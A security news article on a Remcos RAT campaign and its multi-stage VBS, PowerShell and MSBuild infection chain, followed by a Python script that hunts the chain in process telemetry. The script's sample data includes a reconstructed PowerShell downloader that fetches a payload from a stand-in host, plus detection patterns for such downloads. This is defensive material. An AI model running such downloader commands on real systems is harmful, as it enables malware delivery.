New Malware Campaign Spreads Remcos RAT via Multi-Stage Windows Attack

Cybersecurity analysts have uncovered a new malware operation, tracked as SHADOW#REACTOR, that uses a stealthy, multi-stage infection chain to deploy the Remcos remote access trojan (RAT). The campaign is designed to establish persistent, covert control over compromised Windows systems while evading traditional detection mechanisms.

According to a technical report released by Securonix researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee, the attack relies on a carefully sequenced execution flow. An obfuscated Visual Basic Script is launched with wscript.exe, which in turn triggers a PowerShell-based downloader. This downloader retrieves fragmented, text-based payloads from a remote server and reconstructs them entirely in memory.

Evasive Infection Chain and Loader Design

The downloaded fragments are reassembled into encoded loaders and decoded in memory by a .NET Reactor-protected assembly. This loader then fetches a remote Remcos configuration file and applies it dynamically. In the final stage, the attackers abuse MSBuild.exe, a legitimate Microsoft binary, to complete execution and launch the Remcos RAT backdoor.

Once deployed, the malware grants attackers full remote access to the infected system, allowing them to execute commands, monitor activity, and maintain long-term persistence. Researchers assess the campaign as broad and opportunistic, with targets consisting primarily of enterprise environments and small and medium-sized businesses.

Likely Initial Access Broker Activity

While no specific threat actor has been linked to SHADOW#REACTOR, the tactics and tooling align closely with those used by initial access brokers (IABs). These actors typically compromise environments and later sell the access to other criminal groups for financial gain. There is currently no evidence connecting the campaign to a known advanced persistent threat (APT) group.

One of the most notable aspects of this operation is its heavy reliance on intermediate, text-only stagers. Combined with in-memory PowerShell reconstruction and .NET Reactor-protected reflective loading, this approach significantly complicates static analysis and sandbox-based detection.

Step by Step Attack Flow

The infection begins when a user executes a malicious Visual Basic Script file, commonly named win64.vbs, most likely delivered through social engineering such as phishing links. The script runs under wscript.exe and launches a Base64-encoded PowerShell payload.

This PowerShell component uses System.Net.WebClient to contact the remote staging server and downloads a text-based payload named qpwoe64.txt or qpwoe32.txt, depending on the system architecture. The file is saved in the %TEMP% directory.

To ensure reliability, the script repeatedly checks whether the file exists and meets a predefined size threshold. If the payload is incomplete or corrupted, the script pauses and attempts to re-download it. Even if the threshold is never met within the defined timeout window, execution continues rather than terminating, so the infection chain does not break on a partial download.

Persistence and Execution via Living off the Land Binaries

Once validation is complete, the malware constructs a secondary PowerShell script named jdywa.ps1. This script invokes the .NET Reactor-protected loader, which establishes persistence, retrieves the next-stage payload, and performs multiple anti-debugging and anti-virtual-machine checks.

The final execution of Remcos RAT is performed through MSBuild.exe, a trusted Windows binary, allowing the malware to blend into legitimate system activity. Additional wrapper scripts are also dropped to repeatedly re-trigger the original VBS launcher, ensuring continued access.
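The two passages above (the wscript.exe to encoded-PowerShell downloader step, and the later MSBuild.exe launch) describe a parent-child process chain that is unusual on a workstation and easy to hunt for in process-creation telemetry. The following is an added detection example, not code from Securonix or from the campaign: it walks constructed Sysmon-style events, decodes the -EncodedCommand argument (PowerShell accepts any unambiguous prefix such as -enc, and the payload is UTF-16LE base64), looks for the WebClient-to-%TEMP% download pattern the report describes, and flags MSBuild.exe whose ancestry includes both powershell.exe and wscript.exe. The PIDs, user name, the host example.invalid, the decoded one-liner, the use of -File to run jdywa.ps1 and the MSBuild project file name are all assumptions for illustration.

```python
"""Hunt for the SHADOW#REACTOR-style process chain in process-creation telemetry.

Added example, not Securonix's or the campaign's code. The events below are
constructed to mirror the reported chain (wscript.exe -> encoded PowerShell
downloader -> jdywa.ps1 -> MSBuild.exe); PIDs, paths, example.invalid, the
decoded one-liner and the MSBuild project name are assumptions.
"""
import base64
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcEvent:
    """One process-creation event (Sysmon Event ID 1 / Security 4688 style)."""
    pid: int
    ppid: int
    image: str     # full path of the new process
    cmdline: str   # its command line


def image_name(path: str) -> str:
    """Lower-cased basename of an image path, so rules ignore install location."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# PowerShell accepts any unambiguous prefix of -EncodedCommand; the base64 is UTF-16LE.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext behind -enc/-EncodedCommand, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Strings the report attributes to the first-stage downloader.
STAGER_MARKERS = ("system.net.webclient", "downloadfile", "downloadstring", "$env:temp", ".txt")


def stager_indicators(script: str) -> list:
    """Markers from STAGER_MARKERS present in a decoded PowerShell script."""
    s = script.lower()
    return [mk for mk in STAGER_MARKERS if mk in s]


def ancestry(events, pid: int) -> list:
    """The process and its parents, nearest first; stops on a missing or cyclic ppid."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def analyze(events) -> list:
    """Two rules drawn from the described chain; returns one dict per hit."""
    hits = []
    for e in events:
        name = image_name(e.image)
        parents = [image_name(a.image) for a in ancestry(events, e.pid)[1:]]
        if name == "powershell.exe" and parents[:1] == ["wscript.exe"]:
            decoded = decode_encoded_command(e.cmdline)
            ind = stager_indicators(decoded) if decoded else []
            if ind:
                hits.append({"rule": "encoded_downloader_from_wscript", "pid": e.pid,
                             "indicators": ind, "decoded": decoded})
        if name == "msbuild.exe" and "powershell.exe" in parents and "wscript.exe" in parents:
            # Final stage: MSBuild launched from a script-driven chain, unlike a
            # developer build whose ancestry is an IDE or a build agent.
            hits.append({"rule": "msbuild_under_script_chain", "pid": e.pid,
                         "chain": [name] + parents})
    return hits


# Constructed sample telemetry (hypothetical user "u"); the downloader one-liner is
# an assumed reconstruction of what the report describes, pointed at example.invalid.
STAGER_PS = ("(New-Object System.Net.WebClient).DownloadFile("
             "'http://example.invalid/qpwoe64.txt', \"$env:TEMP\\qpwoe64.txt\")")
ENC = base64.b64encode(STAGER_PS.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\u\Downloads\win64.vbs"'),
    ProcEvent(300, 200, PS, "powershell.exe -nop -w hidden -enc " + ENC),
    ProcEvent(400, 300, PS,
              r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\u\AppData\Local\Temp\jdywa.ps1"),
    ProcEvent(500, 400, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\Users\u\AppData\Local\Temp\project.xml"),
    # Benign controls: a developer build and an admin's interactive PowerShell.
    ProcEvent(600, 1, r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
              "devenv.exe"),
    ProcEvent(700, 600, r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
              "MSBuild.exe proj.sln"),
    ProcEvent(800, 100, PS, "powershell.exe -Command Get-Process"),
]

if __name__ == "__main__":
    for h in analyze(SAMPLE_EVENTS):
        print(h["rule"], h["pid"], h.get("indicators") or h.get("chain"))
```

Run against the sample, only PIDs 300 and 500 fire; the devenv.exe-spawned MSBuild and the interactive PowerShell do not. The ancestry walk is what keeps the MSBuild rule precise: on a build server MSBuild is normal, but MSBuild with wscript.exe anywhere above it is not, and that condition survives the attackers swapping file names such as win64.vbs or jdywa.ps1.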

Securonix researchers note that the overall behavior points to a modular, actively maintained loader framework. The combination of text-based intermediates, in-memory decoding, .NET Reactor obfuscation, and LOLBin abuse reflects a deliberate strategy to bypass antivirus engines and sandbox environments and to slow analyst investigation.
